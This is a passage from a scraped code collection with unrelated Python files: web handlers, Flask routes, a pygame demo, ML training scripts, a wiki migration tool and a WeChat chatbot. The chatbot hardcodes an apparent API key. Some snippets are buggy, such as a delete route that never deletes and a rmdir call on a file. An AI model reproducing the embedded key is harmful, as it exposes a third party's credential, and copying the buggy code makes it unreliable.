column\n if index != 0:\n output_row[keys[index]] = value\n output[row[0]] = output_row\n return output\n","sub_path":"server/helpers/CoOccurrenceMatrixParser.py","file_name":"CoOccurrenceMatrixParser.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"4236946","text":"import webapp2\n\nimport enki\nimport enki.libutil\nimport enki.textmessages as MSG\n\nfrom enki.extensions import Extension\nfrom enki.extensions import ExtensionPage\nfrom enki.modeldisplayname import EnkiModelDisplayName\nfrom enki.modelfriends import EnkiModelFriends\nfrom enki.modelmessage import EnkiModelMessage\n\n\nclass HandlerFriends( enki.HandlerBase ):\n\n\tdef get( self ):\n\t\tif self.ensure_is_logged_in() and self.ensure_has_display_name():\n\t\t\tself.render_tmpl( 'friends.html',\n\t\t\t active_menu = 'profile',\n\t\t\t data = EnkiModelFriends.get_friends_user_id_display_name_url( self.user_id ))\n\n\tdef post( self ):\n\t\tif self.ensure_is_logged_in() and self.ensure_has_display_name():\n\t\t\tself.check_CSRF()\n\t\t\tuser_id = self.user_id\n\t\t\tfriend_id_invite = self.request.get( 'invite' )\n\t\t\tfriend_id_remove = self.request.get( 'remove' )\n\t\t\tfriend_name_search = self.request.get( 'search' ).strip()[:( EnkiModelDisplayName.DISPLAY_NAME_LENGTH_MAX + 4 )] # 4 allows for some leading and trailing characters\n\t\t\talready_friends = ''\n\t\t\thas_friends = EnkiModelFriends.exist_by_user_id( user_id )\n\t\t\terror_message = ''\n\t\t\tresult = ''\n\n\t\t\tif friend_id_invite: # send invitation to user to become friend\n\t\t\t\toutcome = EnkiModelFriends.send_friend_request( user_id, int( friend_id_invite ))\n\t\t\t\tif outcome == EnkiModelFriends.INFO_FRIENDS:\n\t\t\t\t\tself.add_infomessage( MSG.SUCCESS(), MSG.FRIEND_ADDED( EnkiModelDisplayName.get_display_name( int( friend_id_invite ))))\n\t\t\t\telif outcome == enki.libutil.ENKILIB_OK:\n\t\t\t\t\tself.add_infomessage( MSG.SUCCESS(), MSG.FRIEND_INVITATION_SENT( EnkiModelDisplayName.get_display_name( int( friend_id_invite ))))\n\t\t\telif friend_id_remove: # unfriend\n\t\t\t\tEnkiModelFriends.remove_friend( user_id, int( friend_id_remove ))\n\t\t\t\thas_friends = EnkiModelFriends.exist_by_user_id( user_id )\n\t\t\t\tself.add_infomessage( MSG.SUCCESS(), MSG.FRIEND_REMOVED( EnkiModelDisplayName.get_display_name( int( friend_id_remove ))))\n\t\t\telif friend_name_search: # search for user to invite\n\t\t\t\tusers_ids_to_ignore = [ user_id ]\n\t\t\t\tif has_friends:\n\t\t\t\t\tusers_ids_to_ignore += EnkiModelFriends.get_friends_user_id( user_id )\n\t\t\t\tresult = EnkiModelDisplayName.find_users_by_display_name( friend_name_search, users_ids_to_ignore )\n\t\t\t\tif result.error == EnkiModelDisplayName.ERROR_DISPLAY_NAME_INVALID:\n\t\t\t\t\terror_message = MSG.DISPLAY_NAME_INVALID()\n\t\t\t\telif result.error == EnkiModelDisplayName.ERROR_DISPLAY_NAME_NOT_EXIST:\n\t\t\t\t\terror_message = MSG.DISPLAY_NAME_NOT_EXIST()\n\t\t\telse:\n\t\t\t\terror_message = MSG.DISPLAY_NAME_NEEDED()\n\n\t\t\tif has_friends:\n\t\t\t\talready_friends = EnkiModelFriends.get_friends_user_id_display_name_url( user_id )\n\n\t\t\tself.render_tmpl( 'friends.html',\n\t\t\t data = already_friends,\n\t\t\t error = error_message,\n\t\t\t result = result,\n\t\t\t friend_name = friend_name_search )\n\n\nclass HandlerMessages( enki.HandlerBase ):\n\n\tdef get( self ):\n\t\tif self.ensure_is_logged_in() and self.ensure_has_display_name():\n\t\t\tself.render_tmpl( 'messages.html',\n\t\t\t active_menu = 'profile',\n\t\t\t data = EnkiModelMessage.get_messages( self.user_id ))\n\n\tdef post( self ):\n\t\tif self.ensure_is_logged_in() and self.ensure_has_display_name():\n\t\t\tself.check_CSRF()\n\t\t\tuser_id = self.user_id\n\t\t\tmessage_accept = self.request.get( 'accept' )\n\t\t\tmessage_decline = self.request.get( 'decline' )\n\n\t\t\tif message_accept:\n\t\t\t\tsender_id = EnkiModelMessage.get_by_id( int( message_accept )).sender\n\t\t\t\tif sender_id:\n\t\t\t\t\tEnkiModelFriends.add_friend( user_id, sender_id )\n\t\t\t\t\tself.add_infomessage( MSG.SUCCESS(), MSG.FRIEND_ADDED( EnkiModelDisplayName.get_display_name( sender_id )))\n\t\t\telif message_decline:\n\t\t\t\tsender_id = EnkiModelMessage.get_by_id( int( message_decline )).sender\n\t\t\t\tif sender_id:\n\t\t\t\t\tEnkiModelMessage.remove_messages_crossed( user_id, sender_id )\n\n\t\t\tself.render_tmpl( 'messages.html',\n\t\t\t data = EnkiModelMessage.get_messages( self.user_id ) )\n\n\nclass ExtensionPageFriendsMessages( ExtensionPage ):\n\n\tdef __init__( self ):\n\t\tExtensionPage.__init__( self, route_name = 'profile', template_include = 'incfriendsmessages.html' )\n\n\tdef get_data( self, handler ):\n\t\tif handler.ensure_is_logged_in():\n\t\t\tfriends = EnkiModelFriends.count_by_user_id( handler.user_id )\n\t\t\tmessages = EnkiModelMessage.count_by_recipient( handler.user_id )\n\t\t\tdata = [ friends, messages ]\n\t\t\treturn data\n\n\nclass ExtensionPageMessageAlert( ExtensionPage ):\n\n\tdef __init__( self ):\n\t\tExtensionPage.__init__( self, route_name = 'navbar', template_include = 'incmessagealert.html' )\n\n\tdef get_data( self, handler ):\n\t\tdata = [ 0 ]\n\t\tif handler.user_id:\n\t\t\tif EnkiModelMessage.exist_by_recipient( handler.user_id ):\n\t\t\t\tdata = [ 1 ] # user has message\n\t\treturn data\n\n\nclass ExtensionFriends( Extension ):\n\n\tdef get_routes( self ):\n\t\treturn [ webapp2.Route( '/friends', HandlerFriends, name = 'friends' ),\n\t\t webapp2.Route( '/messages', HandlerMessages, name = 'messages' ),\n\t\t ]\n\n\tdef get_page_extensions( self ):\n\t\treturn [ ExtensionPageFriendsMessages(), ExtensionPageMessageAlert()]\n","sub_path":"enki/handlersfriends.py","file_name":"handlersfriends.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"647709967","text":"from datetime import datetime\nfrom flask import Blueprint, session, abort, request, Response, json, Flask\nfrom werkzeug.utils import secure_filename\nfrom models.album import Album\nfrom models.album_tag import Album_tag\nfrom models.photo import Photo\nimport os\nimport services.serviceSettings\n\nalbum_bp = Blueprint('album', __name__)\n\n'''리눅스 서버에서 어떻게 돌릴지'''\nUPLOAD_FOLDER = 'C:\\\\Users\\\\Home\\\\Documents\\\\pholask-backend\\\\image'\nALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n@album_bp.route(\"/\", methods=['POST'])\ndef make_album():\n if 'uid' in session:\n u = services.serviceSettings.u.findByUid(session['uid'])\n if request.json['title'] == \"\":\n abort(400)\n u.albums = [Album(title=request.json['title'], created_at=datetime.utcnow())]\n services.serviceSettings.u.addUser(u)\n a = services.serviceSettings.a.findByUid(session['uid'])\n for x in range(len(request.json['tag'])):\n a.album_tags.append(Album_tag(request.json['tag'][x]))\n x += 1\n services.serviceSettings.a.addAlbum(a)\n response = Response(status=200, content_type='application/json')\n data = json.dumps({\"aid\": a.aid, \"title\": a.title, \"createdAt\": a.created_at})\n response.set_data(data)\n return response\n else:\n return abort(401)\n\n@album_bp.route(\"/\", methods=['DELETE'])\ndef delete_album(aid):\n if 'uid' in session:\n if services.serviceSettings.a.isValidAid(aid) == False:\n abort(401)\n a = services.serviceSettings.a.findByAid(aid)\n if a == None:\n abort(404)\n u = services.serviceSettings.u.findByUid(uid=session['uid'])\n if a.user_uid != u.uid:\n abort(403)\n services.serviceSettings.a.addAlbum(a)\n response = Response(status=204, content_type='application/json')\n return response\n else:\n abort(401)\n\n@album_bp.route(\"//follow\", methods=['POST'])\ndef follow_album(aid):\n if 'uid' in session:\n if services.serviceSettings.a.isValidAid(aid) == False:\n abort(401)\n a = services.serviceSettings.a.findByAid(aid)\n if a == None:\n abort(404)\n follower = services.serviceSettings.u.findByUid(uid=session['uid'])\n if (follower in a.follow) == True:\n abort(409)\n a.follow.append(follower)\n services.serviceSettings.a.addAlbum(a)\n response = Response(status=200, content_type='application/json')\n data = json.dumps({\"follow\": \"true\", \"count\": len(a.follow)})\n response.set_data(data)\n return response\n else:\n abort(401)\n\n@album_bp.route(\"//unfollow\", methods=['POST'])\ndef unfollow_album(aid):\n if 'uid' in session:\n if services.serviceSettings.a.isValidAid(aid) == False:\n abort(401)\n a = services.serviceSettings.a.findByAid(aid)\n if a == None:\n abort(404)\n follower = services.serviceSettings.u.findByUid(uid=session['uid'])\n if (follower in a.follow) != True:\n abort(409)\n a.follow.remove(follower)\n services.serviceSettings.a.addAlbum(a)\n response = Response(status=200, content_type='application/json')\n data = json.dumps({\"follow\": \"false\", \"count\": len(a.follow)})\n response.set_data(data)\n return response\n else:\n abort(401)\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@album_bp.route(\"//photos\", methods=['POST'])\ndef photos(aid):\n if 'uid' in session:\n if 'file' not in request.files:\n return abort(401)\n file = request.files['file']\n if file.filename == '':\n return abort(400)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n a = services.serviceSettings.a.findByAid(aid)\n if a == None:\n abort(404)\n if a.user != services.serviceSettings.u.findByUid(session['uid']):\n abort(403)\n a.photos = [Photo(image=app.config['UPLOAD_FOLDER']+filename, content=request.form['content'], created_at=datetime.utcnow())]\n services.serviceSettings.a.addAlbum(a)\n return Response(status=201)\n else:\n abort(401)","sub_path":"routes/album.py","file_name":"album.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"598840153","text":"import sys\nimport pygame\n\npygame.init()\nscreen = pygame.display.set_mode((1280,720))\nbox = pygame.Rect(10,10,50,50)\nclock = pygame.time.Clock()\n\n\nwhile True:\n #Hangle events\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit(0)\n elif event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\n sys.exit(0)\n\n #Tickink\n dt = clock.tick()\n print(dt)\n\n #Checkimg input\n keys = pygame.key.get_pressed()\n if keys [pygame.K_d]:\n box.x +=1\n if keys [pygame.K_s]:\n box.y += 1\n if keys [pygame.K_w]:\n box.y -= 1\n if keys[pygame.K_a]:\n box.x -= 1\n\n #Drawing\n screen.fill((0,0,0))\n pygame.draw.rect(screen, (0,150,255),box)\n pygame.display.flip()\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"433174374","text":"# -*- coding: UTF-8 -*-\r\nimport requests\r\nimport itchat\r\nimport json\r\nfrom itchat.content import *\r\nimport os\r\nfrom pydub import AudioSegment\r\nfrom kedaxunfei import xfstt\r\nimport io\r\nimport wave\r\n\r\ndef get_response_tuling(msg):\r\n # 这里我们就像在“3. 实现最简单的与图灵机器人的交互”中做的一样\r\n # 构造了要发送给服务器的数据\r\n apiUrl = 'http://www.tuling123.com/openapi/api'\r\n data = {\r\n 'key' : '3c4f1aa741314038a324f424634c19bd',\r\n 'info' : msg,\r\n 'userid' : 'wechat-robot',\r\n }\r\n try:\r\n r = requests.post(apiUrl, data=data).json()\r\n # 字典的get方法在字典没有'text'值的时候会返回None而不会抛出异常\r\n return r.get('text')\r\n # 为了防止服务器没有正常响应导致程序异常退出,这里用try-except捕获了异常\r\n # 如果服务器没能正常交互(返回非json或无法连接),那么就会进入下面的return\r\n except:\r\n # 将会返回一个None\r\n return\r\n\r\ndef asr(msg):\r\n #语音消息识别转文字输出\r\n msg['Text'](msg['FileName'])\r\n path = str(msg['FileName'])\r\n print(path)\r\n #先从本地获取mp3的bytestring作为数据样本\r\n fp=open(path,'rb')\r\n data=fp.read()\r\n fp.close()\r\n #主要部分\r\n aud=io.BytesIO(data)\r\n AudioSegment.converter = r\"F:\\\\ffmpeg-20190422-eeca67e-win64-static\\\\ffmpeg-20190422-eeca67e-win64-static\\\\bin\\\\ffmpeg.exe\"\r\n sound=AudioSegment.from_file(aud,format='mp3')\r\n raw_data = sound._data\r\n #写入到文件,验证结果是否正确。\r\n l=len(raw_data)\r\n f=wave.open(\"tmp.wav\",'wb')\r\n f.setnchannels(1)\r\n f.setsampwidth(2)\r\n f.setframerate(16000)\r\n f.setnframes(l)\r\n f.writeframes(raw_data)\r\n f.close()\r\n os.remove(msg['FileName'])\r\n return xfstt('tmp.wav')\r\n\r\n@itchat.msg_register(TEXT)#因为之前把itchat.content全部import了,里面有TEXT变量\r\ndef tuling_reply_text(msg):\r\n # 注册文字消息获取后的处理\r\n # 为了保证在图灵Key出现问题的时候仍旧可以回复,这里设置一个默认回复\r\n defaultReply = 'I received a: ' + msg['Text']\r\n return get_response_tuling(msg['Text']) or defaultReply\r\n\r\n@itchat.msg_register(RECORDING)\r\ndef tuling_reply(msg):\r\n # 注册语音消息获取后的处理\r\n # 为了保证在图灵Key出现问题的时候仍旧可以回复,这里设置一个默认回复\r\n defaultReply = 'I received a: ' + msg['Type']\r\n\r\n # 如果图灵Key出现问题,那么reply将会是None\r\n # print(msg)\r\n asrMessage = asr(msg)\r\n return get_response_tuling(asrMessage) or defaultReply\r\n # return defaultReply\r\n\r\n# 为了让实验过程更加方便(修改程序不用多次扫码),我们使用热启动hotReload=True\r\nitchat.auto_login(hotReload=True,enableCmdQR=2)\r\nitchat.run()","sub_path":"retrieval/scripts/stt.py","file_name":"stt.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"365530253","text":"from lda2vec import utils, b_model\nimport numpy as np\nimport os\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\n\n# Path to preprocessed data\ndata_path = \"data/clean_data\"\n# Whether or not to load saved embeddings file\nload_embeds = True\n\n# Load data from files\n(idx_to_word, word_to_idx, freqs, pivot_ids, target_ids, doc_ids, embed_matrix, bias_idxes) = utils.load_preprocessed_data(\n data_path, load_embed_matrix=load_embeds, load_bias_idxes=True)\n\nbias_words = ['privacy', 'anonymity','confidentiality','disclosure']\nbias_idxes = [word_to_idx[word] for word in bias_words]\n\n# Number of unique documents\nnum_docs = len(np.unique(doc_ids))\n# Number of unique words in vocabulary (int)\nvocab_size = embed_matrix.shape[0] \n# Embed layer dimension size\n# If not loading embeds, change 128 to whatever size you want.\nembed_size = embed_matrix.shape[1] if load_embeds else 128\n# Number of topics to cluster into\nnum_topics = 20\n# Number of topics to bias\nnum_bias_topics = 5\n# How strongly we bias the topics\nbias_lambda = 1e-2\n# Factor that determines how much bias topics have to be close to all bias terms\n# 0 is uniform focus, 100+ is hard specialization\nbias_unity = 20.0\n\ntarget_bias_topic_cov=0.8\n# Epoch that we want to \"switch on\" LDA loss\nswitch_loss_epoch = 5\n# Pretrained embeddings\npretrained_embeddings = embed_matrix if load_embeds else None\n# If True, save logdir, otherwise don't\nsave_graph = True\nnum_epochs = 200\nbatch_size = 512 #4096\nlmbda = 1e-4\nlogdir = \"bias_experiment\"\n\n# Initialize the model\nm = b_model(num_docs,\n vocab_size,\n num_topics,\n bias_idxes,\n bias_topics=num_bias_topics,\n bias_lmbda=bias_lambda,\n bias_unity=bias_unity,\n target_bias_topic_cov=0.8,\n embedding_size=embed_size,\n pretrained_embeddings=pretrained_embeddings,\n freqs=freqs,\n batch_size = batch_size,\n save_graph_def=save_graph,\n logdir=logdir)\n\n# Train the model\nm.train(pivot_ids,\n target_ids,\n doc_ids,\n len(pivot_ids),\n num_epochs,\n idx_to_word=idx_to_word,\n switch_loss_epoch=switch_loss_epoch)\n\n# Visualize topics with pyldavis\nutils.generate_ldavis_data(data_path, m, idx_to_word, freqs, vocab_size)","sub_path":"tests/nela/run_nela_b.py","file_name":"run_nela_b.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"274348548","text":"import tensorflow as tf\nfrom image_segmentation.VggBlock import VggBlock\n\n\"\"\"\nSo if you're wondering, \"should I use the Layer class or the Model class?\", ask yourself: will I need to call fit() on it?\nWill I need to call save() on it? If so, go with Model. If not (either because your class is just a block in a bigger \nsystem, or because you are writing training & saving code yourself), use Layer.\n\nIn general like this example: https://www.tensorflow.org/guide/keras/custom_layers_and_models#the_model_class\nthe Decoder and Encoder must be defined as subclass Layer, but cause I gonna load the pre-trained weights for VGG16\nI have to define as subclass model\n\"\"\"\n\n\nclass Encoder(tf.keras.Model):\n def __init__(self):\n super(Encoder, self).__init__()\n self.conv_blk_5 = None\n self.conv_blk_4 = None\n self.conv_blk_3 = None\n self.conv_blk_2 = None\n self.conv_blk_1 = None\n\n def build(self, input_shape):\n self.conv_blk_1 = VggBlock(layers=2, filters=64, kernel_size=3, name=\"enc_conv_blk_1\")\n self.conv_blk_2 = VggBlock(layers=2, filters=128, kernel_size=3, name=\"enc_conv_blk_2\")\n self.conv_blk_3 = VggBlock(layers=3, filters=256, kernel_size=3, name=\"enc_conv_blk_3\")\n self.conv_blk_4 = VggBlock(layers=3, filters=512, kernel_size=3, name=\"enc_conv_blk_4\")\n self.conv_blk_5 = VggBlock(layers=3, filters=512, kernel_size=3, name=\"enc_conv_blk_5\")\n\n def call(self, inputs):\n x = self.conv_blk_1(inputs)\n blk_1_out = x\n x = tf.keras.layers.MaxPooling2D((2, 2), strides=2, name=\"max_pool_1\")(x)\n\n x = self.conv_blk_2(x)\n blk_2_out = x\n x = tf.keras.layers.MaxPooling2D((2, 2), strides=2, name=\"max_pool_2\")(x)\n\n x = self.conv_blk_3(x)\n blk_3_out = x\n x = tf.keras.layers.MaxPooling2D((2, 2), strides=2, name=\"max_pool_3\")(x)\n\n x = self.conv_blk_4(x)\n blk_4_out = x\n x = tf.keras.layers.MaxPooling2D((2, 2), strides=2, name=\"max_pool_4\")(x)\n\n x = self.conv_blk_5(x)\n blk_5_out = x\n x = tf.keras.layers.MaxPooling2D((2, 2), strides=2, name=\"max_pool_5\")(x)\n\n return blk_1_out, blk_2_out, blk_3_out, blk_4_out, blk_5_out, x\n","sub_path":"image_segmentation/image_segmentation/Encoder.py","file_name":"Encoder.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"206170360","text":"import dash_bootstrap_components as dbc\nimport dash_html_components as html\nimport dash_core_components as dcc\n\n\nupload_data = dcc.Upload(\n id='upload-data',\n children=html.Div([\n 'Перетащите сюда файл или - ',\n dbc.Button(\"Выберете его из папки\", className=\"mr-1\")\n ]),\n style={\n 'width': '100%',\n 'height': '60px',\n 'lineHeight': '60px',\n 'borderWidth': '1px',\n 'borderStyle': 'dashed',\n 'borderRadius': '5px',\n 'textAlign': 'center',\n 'margin': '10px'\n },\n # Allow multiple files to be uploaded\n multiple=True\n)\n\n\nuploaded_data = dcc.Loading(\n html.Div(id='output-data-upload')\n)\n\n\ntab_upload_content = dbc.Card(\n dbc.CardBody(\n [\n dbc.Row(dbc.Col(upload_data)),\n dbc.Row(dbc.Col(dbc.Card(dbc.CardBody(uploaded_data))))\n ]\n ),\n className=\"mt-3\",\n)\n\n\n","sub_path":"SKE/upload_data.py","file_name":"upload_data.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"645043263","text":"\n\n#calss header\nclass _PLOT():\n\tdef __init__(self,): \n\t\tself.name = \"PLOT\"\n\t\tself.definitions = [u'the story of a book, film, play, etc.: ', u'a secret plan made by several people to do something that is wrong, harmful, or not legal, especially to do damage to a person or a government: ', u'a small piece of land that has been marked or measured for a particular purpose: ', u'a diagram or chart']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_plot.py","file_name":"_plot.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"172908636","text":"'''\nCreated on Jan 23, 2013\n\n@author: jcm\n'''\n\nfrom ..analyzers import MetricSpaceAnalyzerFactory\nfrom ..detectors import IVTermDetectorBasicFactory\nfrom preprocessing import BasicDocumentPreprocessor\nfrom cand_gen import CandidateGenerator\n\nimport logging\n\n\nclass LexicalNormalizer(object):\n cname = __name__ + '.LexicalNormalizer'\n def __init__(self,vocabulary_set):\n # instance oov detector\n self.detector = IVTermDetectorBasicFactory.create_detector(vocabulary_set)\n \n \n # instance analyzers and push them to the candidate generator\n cand_generator = CandidateGenerator() \n for resource in vocabulary_set: \n cand_generator.add_analyzer(\"metric-space\", MetricSpaceAnalyzerFactory.create_analyzer(resource))\n \n self.cand_generator = cand_generator\n \n # instance preprocessor and logger\n self.preprocessor = BasicDocumentPreprocessor()\n self.logger = logging.getLogger(LexicalNormalizer.cname) \n \n def _generate_alternatives(self, doc_items):\n norm_items = []\n for item in doc_items:\n if self.detector.detect_term(item):\n norm_items.append(item)\n else:\n norm_items.append(self.cand_generator.generate_candidates(item))\n \n return norm_items\n \n \n def normalize_document(self, doc):\n proc_document = self.preprocessor.process(doc)\n item_alternatives = self._generate_alternatives(proc_document)\n return item_alternatives \n","sub_path":"lsnorm/core/normalizer.py","file_name":"normalizer.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"373599801","text":"#选择排序\nimport random\n\ndef SortTest(List):\n min_index=0 \n for i in range(len(List) - 1):\n # 将起始元素设为最小元素\n min_index = i\n # 第二层for表示最小元素和后面的元素逐个比较\n for j in range(i + 1, len(List)):\n if List[min_index]>List[j]:\n # 如果当前元素比最小元素小,则把当前元素角标记为最小元素角标\n min_index = j\n # 查找一遍后将最小元素与起始元素互换\n num1=List[i]\n List[i]=List[min_index]\n List[min_index]=num1\n return List\n\nif __name__==\"__main__\":\n TestList=[]\n for i in range(10):\n rannum=random.randint(0,100)\n TestList.append(rannum)\n List=SortTest(TestList)\n print(List)","sub_path":"SortTest/SortTest2.py","file_name":"SortTest2.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"342858743","text":"import re\nimport time\nimport pandoc\n\nfrom mediawiki import mediawiki\nfrom gql import gql, Client\nfrom gql.transport.requests import RequestsHTTPTransport\n\n# ============ Wiki.js Client stuff\ntoken = \"\"\nsample_transport=RequestsHTTPTransport(\n url=\"\",\n use_json=True,\n headers={\n \"Authorization\": token,\n \"Content-type\": \"application/json\",\n },\n verify=False,\n retries=5\n)\n\nclient = Client(\n transport=sample_transport,\n fetch_schema_from_transport=True,\n)\n# ============\n\nurl=\"\"\n\nc = mediawiki.MWClient(\n url=url, \n user=\"\", \n password=\"\"\n)\n\ndef continue_str(data):\n try:\n return data[\"continue\"][\"apcontinue\"]\n except KeyError as error:\n pass\n\ndef get_ap():\n apcontinue = \"\"\n full_aplist = []\n counter = 1\n while apcontinue is not None:\n print(f\"Counter: {counter}\")\n print(type(apcontinue))\n apdata = c.allpages(apcontinue=apcontinue).json()\n apcontinue = continue_str(apdata)\n print(type(apcontinue))\n print(\"hello there\")\n aplist = apdata[\"query\"][\"allpages\"]\n print(len(aplist))\n full_aplist = [*full_aplist, *aplist]\n print(f\"full_aplist item count: {len(full_aplist)}\")\n counter += 1\n print(apcontinue)\n\n return full_aplist\n\ndef scrub_title(title):\n title = re.sub(r\"[^\\w\\s]\", '', title)\n title = re.sub(r\"\\s+\", '-', title)\n\n return title\n\nap = get_ap()\nlimit = 5\nfor n in range(limit):\n try:\n for page in ap:\n pageid = page[\"pageid\"]\n print(pageid)\n title = page[\"title\"]\n url_title = scrub_title(title)\n wikijs_path = f\"/import/{url_title}\"\n contents = c.page_contents(pageid=pageid).json()\n wikitext = contents[\"parse\"][\"wikitext\"][\"*\"]\n #print(f\"[DEBUG] >> {wikitext}\")\n read_wikitext = pandoc.read(wikitext, format=\"mediawiki\")\n md_wikitext = pandoc.write(read_wikitext, format=\"markdown\")\n\n query = gql(fr'''\n mutation PageMutation($content: String!, $path: String!, $title: String!) {{\n pages {{\n create(\n content: $content,\n description: \"transfernetic - Mediawiki Import\",\n editor: \"markdown\",\n isPublished: true,\n isPrivate: false,\n locale: \"en\",\n path: $path,\n publishEndDate: \"\",\n publishStartDate: \"\",\n tags: [\"import\"],\n title: $title\n ) {{\n page {{\n id\n }}\n }}\n }}\n }}''')\n print(f\"Added page {title} at {wikijs_path}\")\n results = client.execute(query, variable_values={\"content\": str(md_wikitext), \"path\": str(wikijs_path), \"title\": str(title)})\n time.sleep(5)\n except Exception as e:\n print(f\"Error: {e}\")\n continue","sub_path":"transfernetic.py","file_name":"transfernetic.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"74589979","text":"#!/usr/local/bin/python\n''' A basic Python script to search for a file and then removes it. A good use case scenario is if a computer has excess log files filling up a mounted Volume.\n'''\n\nimport os\n\n# Change variable name as needed\nVAR1 = \"/PATH/TO/FILE\"\n\nif os.path.exists(VAR1):\n os.rmdir(VAR1)\nelse:\n os.path.exists(VAR1)\nprint(\"Files removed successfully\")\n","sub_path":"file_removal.py","file_name":"file_removal.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"7411336","text":"\"\"\"\n Deep Anomaly Detection Using Geometric Transformation.\n\"\"\"\nfrom __future__ import division\nimport os\nimport time\nimport math\nfrom glob import glob\nimport tensorflow as tf\nimport numpy as np\nfrom six.moves import xrange\n\nimport sys\nsys.path.append(os.path.abspath('..'))\n\nfrom utils.ops import *\nfrom utils.utils import *\nfrom utils.data import *\nfrom .model import NET\n\n\n###\nfrom functools import reduce\n###\n\n\nclass DADUGT(NET):\n def __init__(self, sess, config, dataset=None, lamb = 50.):\n super(DADUGT, self).__init__(sess,\n dataset,\n config,\n 'dadugt',\n 'DADUGT-model')\n\n self.y_dim = geometric_transformation_classes()\n self.net_dim = self.default_dim\n self.build_model()\n\n def build_model(self):\n self.y = tf.placeholder(tf.float32, [None, self.y_dim], name='self_label')\n\n #Construct Generator, Discriminators and Encoders\n self.scores, self.logit = self.classifier(self.inputs)\n\n\n # Update Discriminator\n self.loss = tf.reduce_mean(\n softmax_cross_entropy_with_logits(self.logit, self.y))\n\n # summary op.\n t_vars = tf.trainable_variables()\n\n # variables for each networks.\n self.c_vars = [var for var in t_vars if 'c_' in var.name]\n\n # Optimization Setting\n self.optim = tf.train.AdamOptimizer(self.c_lr, beta1=self.beta1) \\\n .minimize(self.loss, var_list=self.c_vars)\n\n self.saver = tf.train.Saver()\n\n\n def train(self, config):\n\n\n\n # summary_op: merge summary\n # self.c_sum = merge_summary([self.score_sum, self.loss_sum])\n\n # Create Tensorboard\n # self.writer = SummaryWriter(os.path.join(\"./logs/DADUGT\", self.model_dir), self.sess.graph)\n\n # Setting variable for debug\n counter = 1\n start_time = time.time()\n could_load, checkpoint_counter, checkpoint_epoch = self.load(self.checkpoint_dir, config.epoch)\n if could_load:\n counter = checkpoint_counter\n print(\" [*] Load SUCCESS\")\n if checkpoint_epoch == config.epoch and config.epoch > 0:\n print(\" [*] Train is already done with given epoch.\")\n return\n else:\n print(\" [!] Load failed...\")\n\n\n batch_idxs = self.dataset.ntrain_batch(config.batch_size)\n\n for epoch in xrange(checkpoint_epoch, config.epoch):\n for idx in xrange(batch_idxs):\n\n #Prepare batch data for learning\n if self.dataset and not self.dataset.transformed:\n batch_images = self.data_X[idx*config.batch_size:(idx+1)*config.batch_size]\n batch_x, batch_y = geometric_transformation(batch_images)\n elif not self.dataset :\n batch_files = self.data[idx*config.batch_size:(idx+1)*config.batch_size]\n batch = [ get_image(batch_file, input_height=self.input_height, input_width=self.input_width,\n resize_height=self.output_height, resize_width=self.output_width,\n crop=self.crop, grayscale=self.grayscale) for batch_file in batch_files]\n if self.grayscale:\n batch_images = np.array(batch).astype(np.float32)[:, :, :, None]\n else:\n batch_images = np.array(batch).astype(np.float32)\n batch_x, batch_y = geometric_transformation(batch_images)\n elif self.dataset and self.dataset.transformed:\n batch_x, batch_y = self.dataset.next_batch(self.batch_size)\n #Make feed dictionary\n feed_dict = {self.inputs: batch_x, self.y:batch_y, self.is_train:True}\n #Run Optimization and Summary Operation\n try:\n self.sess.run(self.optim, feed_dict = feed_dict)\n except:\n continue\n\n counter += 1\n\n if config.verbose:\n if np.mod(counter, config.print_interval) == 0:\n err = self.sess.run(self.loss, feed_dict = feed_dict)\n print(\"Epoch: [%2d] [%4d/%4d] time: %4.4f, loss: %.8f\" \\\n % (epoch, idx, batch_idxs, time.time() - start_time, err))\n\n if np.mod(epoch+1, config.epoch_save_interval) == 0:\n self.save(config.checkpoint_dir, counter, 